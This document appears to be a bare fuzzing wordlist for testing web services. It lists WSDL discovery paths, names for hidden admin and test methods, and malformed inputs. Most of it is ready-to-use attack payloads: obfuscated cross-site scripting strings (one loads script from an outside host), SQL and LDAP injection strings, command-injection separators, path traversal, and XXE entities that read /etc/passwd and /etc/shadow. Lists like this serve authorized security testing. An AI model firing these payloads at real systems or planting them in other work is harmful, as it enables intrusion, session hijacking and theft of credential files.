?WSDL
.asmx?WSDL
.cfc?WSDL
.dll?WSDL
.exe?WSDL
2017806
.php?WSDL
.pl?WSDL
.m?WSDL
.wsdl
/wsdl/ServiceName.wsdl
/axis/services/ServiceName.wsdl
/axis/services/ServiceName.jws?wsdl
admin
administration
administrator
administrative
test
testing
testmethod
testservice
demo
demonstration
demomethod
demoservice
hidden
private
dev
development
devmethod
devservice
config
configuration
conf
settings
-12389
0
0
1.11E+35
abcd
"=!(11"
11="(
!)(
2*2
2%2
2 < 2
2 == 2
2 > 1
10.2
1.111111111
true==
tr==ue
=true'
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaa' 'aaaaaaaaaaaa
aaaaaaaaa<null>aaaaa
Strange input
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa…
¦+Xk+4=-abÄ+A
;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
';!--"<XSS>=&{()}
<IMG SRC=`javascript:alert("'XSS'")`>
\x3cscript src=http://www.example.com/malicious-code.js\x3e\x3c/script\x3e
%3cscript src='javascript:alert("XSS")'%3e%3c/script%3e
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
%u006a%u0061%u0076%u0061%u0073%u0063%u0072%u0069%u0070%u0074%u003a%u0061%u006c%u0065%u0072%u0074%u0028%u0027%u0058%u0053%u0053%u0027%u0029
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
žscriptualert(EXSSE)ž/scriptu
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<HTML xmlns:xss>
  <?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
  <xss:xss>XSS</xss:xss>
</HTML>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
>"'><script>alert(‘XSS')</script>
<script>alert('XSS');</script>>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>
AK%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OS%22
%22%2Balert(%27XSS%27)%2B%22
<object type=text/html data="javascript:alert(([code]);"></object>
<body onload="javascript:alert(([code])"></body>
<table background="javascript:alert(([code])"></table>
>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>
<XML SRC="xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;">
</BODY></HTML>
ldap:/etc
hash:/etc
.//
..
self::node()
0
replay
%x
%s
?
../
/sbin
/tmp
C:\
select user from dual
*
 or '1' = '1';--
&#x27;&#x20;&#x6F;&#x72;&#x20;&#x27;&#x31;&#x27;&#x3D;&#x27;&#x31;&#x27;&#x3B;&#x2D;&#x2D;
%27%20%6F%72%20%27%31%27%3D%27%31%27%3B%2D%2D
&#39&#32&#111&#114&#32&#39&#49&#39&#61&#39&#49&#39&#59&#45&#45
JyBvciAnMSc9JzEnOy0t
true'
tr' || 'ue
1 from users; select * from users; select *
 union select * from users;--
SELECT username FROM dba_users WHERE username like '%'
; echo "EXPLOIT"
| echo "EXPLOIT"
< echo "EXPLOIT"
> echo "EXPLOIT"
: echo "EXPLOIT"
\n echo "EXPLOIT"
26%whatever
[%26]whatever
& whatever
*
find("(&(cn=John))")
"(cn="+user+")"
"(&(uid=*)(uid=*))(|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))";
'
\
/
'
"
while
if
else
(
)
()
[
]
[]
{
}
{}
-
+
*
==
&lt;
&gt;
&amp;
&quot;
&apos;
<
'
<!--/-->
<![CDATA[]]>]]>
$HTMLCode = <![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
<!ENTITY random SYSTEM "file:///dev/random">
<!ENTITY passwd SYSTEM “file:///etc/passwd”>
<!ENTITY shadow SYSTEM “file:///etc/shadow”>
<!ENTITY junk "abcdefghijklmnopqrstuvwxyz1234567890">
?
